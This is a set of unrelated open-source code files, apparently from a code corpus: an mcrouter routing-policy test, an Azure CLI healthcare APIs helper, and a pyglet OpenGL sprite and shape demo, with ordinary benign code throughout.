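        'job-config': {},
        'all-config-resources': {},
    }
    connector = Connector.from_dict(example)
    print(connector.to_dict())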
|
mcrouter/test/test_logical_routing_policies.py | kiaplayer/mcrouter | 2,205 | 12751009 | <gh_stars>1000+
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from mcrouter.test.MCProcess import *
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestLogicalRoutingPolicies(McrouterTestCase):
config = './mcrouter/test/test_logical_routing_policies.json'
extra_args = []
def setUp(self):
self.mc = self.add_server(Memcached())
def test_different_cluster(self):
mcrouter = self.add_mcrouter(self.config, '/region1/cluster2/',
extra_args=self.extra_args)
key = 'foo1'
value = 'value1'
mcrouter.set(key, value)
self.assertEqual(self.mc.get(key), value)
def test_different_region_cluster(self):
mcrouter = self.add_mcrouter(self.config, '/region2/cluster3/',
extra_args=self.extra_args)
key = 'foo2'
value = 'value2'
mcrouter.set(key, value)
self.assertEqual(self.mc.get(key), value)
|
src/healthcareapis/azext_healthcareapis/manual/custom.py | haroonf/azure-cli-extensions | 207 | 12751014 | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from azure.cli.core.util import sdk_no_wait
def healthcareapis_service_show(client,
resource_group_name,
resource_name):
return client.get(resource_group_name=resource_group_name,
resource_name=resource_name)
# we use this as a create or update
def healthcareapis_service_create(client,
resource_group_name,
resource_name,
kind,
location,
tags=None,
etag=None,
identity_type=None,
access_policies=None,
cosmos_db_configuration=None,
authentication_configuration=None,
cors_configuration=None,
private_endpoint_connections=None,
public_network_access=None,
export_configuration_storage_account_name=None,
no_wait=False):
properties = {
'access_policies': access_policies,
'authentication_configuration': authentication_configuration,
'cors_configuration': cors_configuration,
'cosmos_db_configuration': cosmos_db_configuration,
'private_endpoint_connections': private_endpoint_connections,
'public_network_access': public_network_access
}
if export_configuration_storage_account_name is not None:
properties['export_configuration'] = {
'storage_account_name': export_configuration_storage_account_name
}
service_description = {
'name': resource_name,
'kind': kind,
'location': location,
'etag': etag,
'properties': properties,
'tags': tags
}
if identity_type is not None:
service_description['identity'] = {
'principal_id': None,
'tenant_id': None,
'type': identity_type,
}
else:
service_description['identity'] = {
'principal_id': None,
'tenant_id': None,
'type': "None",
}
return sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=resource_name,
service_description=service_description)
|
examples/opengl/opengl_core.py | HenrYxZ/pyglet | 1,160 | 12751037 | import pyglet
from pyglet.gl import *
# pyglet.options['debug_gl_shaders'] = True
window = pyglet.window.Window(width=540, height=540, resizable=True)
batch = pyglet.graphics.Batch()
print("OpenGL Context: {}".format(window.context.get_info().version))
##########################################################
# TESTS !
##########################################################
label = pyglet.text.Label("This is a test", x=0, y=180, dpi=200, color=(255, 25, 255, 150), batch=batch)
vertex_list = pyglet.graphics.vertex_list(3, ('position3f', (100, 300, 0, 200, 250, 0, 200, 350, 0)),
('colors4f', (1, 0, 0, 1, 0, 1, 0, 1, 0.3, 0.3, 1, 1)))
def create_quad_vertex_list(x, y, z, width, height):
return x, y, z, x + width, y, z, x + width, y + height, z, x, y + height, z
batch.add_indexed(4, GL_TRIANGLES, None, [0, 1, 2, 0, 2, 3],
('position3f', create_quad_vertex_list(480, 270, -11, 50, 50)),
('colors4f', (1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1)))
batch.add_indexed(4, GL_TRIANGLES, None, [0, 1, 2, 0, 2, 3],
('position3f', (400, 400, 0, 400+50, 400, 0, 400+50, 400+50, 0, 400, 400+50, 0)),
('colors4f', (1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1)))
img = pyglet.image.load("pyglet.png")
img.anchor_x = img.width // 2
img.anchor_y = img.height // 2
red = pyglet.image.SolidColorImagePattern((255, 0, 0, 255)).create_image(50, 50)
green = pyglet.image.SolidColorImagePattern((0, 255, 0, 255)).create_image(50, 50)
blue = pyglet.image.SolidColorImagePattern((0, 0, 255, 255)).create_image(50, 50)
white = pyglet.image.SolidColorImagePattern((255, 255, 255, 255)).create_image(50, 50)
sprites = [pyglet.sprite.Sprite(img=img, x=60, y=80, batch=batch),
pyglet.sprite.Sprite(img=img, x=110, y=90, batch=batch),
pyglet.sprite.Sprite(img=img, x=160, y=100, batch=batch),
pyglet.sprite.Sprite(img=img, x=210, y=110, batch=batch)]
for sprite in sprites:
sprite.opacity = 220
sprite2 = pyglet.sprite.Sprite(img=red, x=200, y=400, batch=batch)
sprite3 = pyglet.sprite.Sprite(img=green, x=300, y=300, batch=batch)
sprite4 = pyglet.sprite.Sprite(img=blue, x=400, y=200, batch=batch)
sprite5 = pyglet.sprite.Sprite(img=white, x=500, y=100, batch=batch)
standalone_sprite = pyglet.sprite.Sprite(img=white, x=600, y=0)
##########################################################
# Modify the sprite scale value by scrolling the mouse
##########################################################
@window.event
def on_mouse_scroll(x, y, mouse, direction):
for spr in sprites:
spr.scale += direction / 10
###########################################################
#
###########################################################
@window.event
def on_draw():
window.clear()
# pyglet.graphics.draw(3, GL_TRIANGLES, ('position3f', (100, 100, 0, 200, 100, 0, 150, 200, 0)),
# ('colors3f', (1, 0.5, 0.2, 1, 0.5, 0.2, 1, 0.5, 0.2)))
#
# pyglet.graphics.draw_indexed(4, GL_TRIANGLES, [0, 1, 2, 0, 2, 3],
# ('position2i', (225, 300, 250, 300, 250, 325, 225, 325)),
# ('colors3f', (0.5, 1, 0.2, 0.5, 0.2, 1, 0.2, 0.5, 1, 1, 0.5, 0.2)))
vertex_list.draw(GL_TRIANGLES)
batch.draw()
standalone_sprite.draw()
def update(dt):
for sprite in sprites:
sprite.rotation += 100 * dt % 360
if __name__ == "__main__":
pyglet.gl.glClearColor(0.2, 0.3, 0.3, 1)
pyglet.clock.schedule_interval(update, 1/60)
pyglet.app.run()
|